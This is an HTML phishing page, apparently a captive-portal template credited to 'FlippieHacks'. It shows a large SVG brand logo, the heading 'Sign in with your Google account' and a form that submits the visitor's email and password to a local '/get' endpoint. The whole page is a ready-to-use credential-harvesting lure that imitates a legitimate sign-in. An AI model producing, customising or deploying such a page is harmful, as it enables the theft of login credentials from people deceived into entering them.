<!--By FlippieHacks
https://github.com/FlippieHacks/ -->
<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #FFC72C;
  margin-right: 100px
}


.form-container {
  background: #FFFFFF;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 2px solid #073589;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #073589;
  border: none;
  color: #FFFFFF;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
}

.submit-btn:hover {
  background: #073589;
}



</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
  <svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="500.000000pt" height="50.000000pt" viewBox="0 0 2560.000000 421.000000"
 preserveAspectRatio="xMidYMid meet">
<g transform="translate(0.000000,421.000000) scale(0.100000,-0.100000)"
fill="#073589" stroke="none">
<path d="M0 2105 l0 -2105 12800 0 12800 0 0 2105 0 2105 -12800 0 -12800 0 0
-2105z m3347 1805 c-6 -72 -25 -100 -139 -212 -176 -171 -387 -306 -579 -368
-189 -62 -309 -80 -599 -90 -375 -13 -478 -34 -603 -123 -124 -89 -250 -255
-287 -377 -22 -72 -40 -248 -40 -383 0 -82 2 -90 26 -112 15 -14 51 -34 82
-45 108 -41 186 -117 251 -248 23 -46 79 -114 203 -248 94 -102 189 -198 212
-214 23 -15 69 -36 102 -45 78 -23 177 -75 241 -127 72 -60 298 -330 392 -468
169 -250 309 -501 314 -565 1 -21 -3 -30 -16 -33 -22 -4 -58 31 -304 304 -308
341 -448 451 -822 644 -303 158 -575 305 -615 333 -28 20 -419 470 -477 550
-46 63 -74 122 -119 252 -55 160 -54 197 6 318 26 50 62 116 80 145 40 62 42
76 10 123 -24 35 -24 35 -81 29 -63 -7 -68 -4 -100 73 -13 31 -15 58 -9 132 6
86 5 94 -16 123 -26 35 -29 82 -6 116 21 33 211 81 323 81 73 0 84 -3 108 -25
55 -51 68 -94 69 -219 1 -71 5 -116 12 -118 23 -8 244 397 244 447 0 74 80
163 177 200 144 54 458 74 698 46 629 -75 809 -74 982 4 34 16 103 58 154 94
51 36 101 66 112 66 18 0 19 -5 14 -60z m2358 -269 c280 -26 504 -98 686 -222
277 -187 407 -492 319 -744 -57 -165 -235 -340 -493 -485 -32 -18 -56 -38 -54
-44 3 -6 97 -150 209 -321 113 -170 274 -416 358 -545 84 -129 159 -245 168
-258 l14 -22 -495 0 -495 0 -63 98 c-34 53 -186 287 -336 520 l-275 422 -224
0 -224 0 0 -520 0 -520 -460 0 -460 0 0 998 c0 549 3 1148 7 1331 l6 333 846
-5 c497 -3 896 -9 966 -16z m2475 -501 c212 -286 387 -520 390 -520 3 0 35 40
71 88 37 48 167 218 289 377 122 160 267 351 321 426 l99 137 262 7 c145 3
372 5 506 3 l243 -3 -478 -570 c-263 -313 -565 -673 -671 -799 l-192 -229 0
-529 0 -528 -460 0 -460 0 -1 478 c0 262 -3 506 -8 542 l-7 65 -305 365 c-433
520 -983 1189 -987 1200 -2 6 185 10 500 10 l503 0 385 -520z m3976 495 c7 -9
32 -65 55 -123 97 -245 340 -819 688 -1630 204 -475 371 -867 371 -873 0 -6
-177 -8 -472 -7 l-471 3 -123 304 c-68 168 -127 308 -132 313 -4 4 -229 5
-498 1 l-491 -6 -122 -309 -122 -308 -475 0 c-261 0 -474 2 -474 4 0 2 118
282 263 623 145 340 398 937 562 1327 l299 709 565 -5 c516 -5 566 -7 577 -23z
m2742 -172 c76 -109 206 -297 289 -418 82 -121 246 -361 364 -534 l214 -315 6
340 c3 186 7 516 8 732 l1 392 462 0 461 0 -6 -562 c-4 -310 -7 -908 -7 -1330
l0 -768 -467 0 -468 1 -645 914 -645 915 -6 -777 c-3 -428 -7 -840 -8 -915
l-1 -138 -455 0 -455 0 0 1330 0 1330 609 0 610 0 139 -197z m4346 90 c60
-137 1075 -2500 1087 -2531 l9 -22 -476 2 -476 3 -121 308 -121 307 -501 0
-501 0 -119 -310 -118 -310 -475 0 c-447 0 -474 1 -470 18 5 14 1041 2469
1098 2600 l19 42 559 0 559 0 47 -107z m2276 -1223 l0 -1330 -460 0 -460 0 0
1330 0 1330 460 0 460 0 0 -1330z m2220 1320 c356 -18 487 -41 669 -116 149
-62 237 -120 346 -229 152 -151 215 -288 215 -466 -1 -233 -163 -441 -490
-629 -49 -29 -90 -54 -90 -57 0 -2 40 -63 88 -136 155 -230 662 -1007 662
-1012 0 -3 -222 -5 -492 -4 l-493 0 -335 517 -336 517 -222 3 -222 2 0 -520 0
-520 -460 0 -460 0 0 1328 0 1329 708 2 c396 1 797 -3 912 -9z m-20663 -362
c12 -11 27 -42 33 -69 21 -86 -15 -315 -129 -834 -117 -533 -187 -1091 -179
-1430 3 -116 1 -136 -14 -151 -16 -17 -19 -17 -39 2 -70 63 -84 179 -84 689
l1 390 32 205 c18 113 50 311 72 440 21 129 46 321 54 425 9 110 22 209 31
236 19 55 59 96 111 114 45 16 80 10 111 -17z m-459 -120 c65 -71 58 -161 -58
-735 -87 -431 -92 -471 -99 -840 -5 -279 -8 -325 -22 -339 -15 -15 -18 -14
-39 8 -12 12 -28 34 -35 49 -18 34 -62 306 -76 465 -22 265 21 723 114 1203
24 124 25 125 70 168 38 35 53 43 85 43 27 0 45 -7 60 -22z m-448 -66 c14 -10
33 -34 43 -53 24 -44 18 -170 -18 -389 -39 -242 -82 -586 -100 -810 -20 -241
-21 -249 -41 -257 -62 -24 -108 177 -120 532 -8 203 4 399 42 695 30 235 37
263 72 290 32 25 81 22 122 -8z m-376 -25 c36 -36 39 -87 17 -243 -33 -229
-52 -447 -59 -661 -6 -174 -10 -205 -25 -220 -21 -22 -45 -10 -66 32 -35 71
-66 492 -59 792 4 165 6 183 28 228 27 54 78 95 117 95 13 0 34 -11 47 -23z"/>
<path d="M5018 3073 l-218 -3 0 -224 c0 -122 2 -225 4 -227 2 -2 161 -1 353 2
322 5 353 7 413 27 90 30 156 75 195 136 53 81 53 87 -3 144 -51 53 -123 95
-203 118 -53 16 -222 35 -284 31 -22 -1 -138 -3 -257 -4z"/>
<path d="M11572 2903 c-24 -60 -272 -716 -272 -719 0 -2 129 -4 286 -4 268 0
286 1 279 18 -3 9 -67 177 -141 372 -75 195 -137 356 -138 358 -2 1 -8 -10
-14 -25z"/>
<path d="M18545 2663 c-54 -142 -117 -307 -140 -368 l-43 -110 281 -3 c154 -1
282 -1 284 2 6 5 -269 736 -277 736 -4 0 -51 -116 -105 -257z"/>
<path d="M23468 3075 c-3 -3 -100 -6 -216 -6 l-212 -1 0 -227 0 -226 97 2 c54
2 206 4 338 6 266 5 308 12 430 72 39 19 85 49 104 66 33 30 33 31 21 75 -28
98 -103 171 -214 208 -71 24 -332 47 -348 31z"/>
</g>
</svg>


  
  </div>

  <div class="form-container">

    <center><h1>Sign in with your Google account</h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email or mobile phone number" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>

      <button class="submit-btn" type="submit">Continue</button>

    </form>

  </div>

</div>

</body>
</html>
